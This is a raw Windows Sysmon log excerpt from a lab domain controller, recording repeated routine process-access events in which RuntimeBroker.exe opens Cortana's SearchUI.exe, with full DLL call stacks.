13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405456C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405456C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406028C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000012650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406028C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000012649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
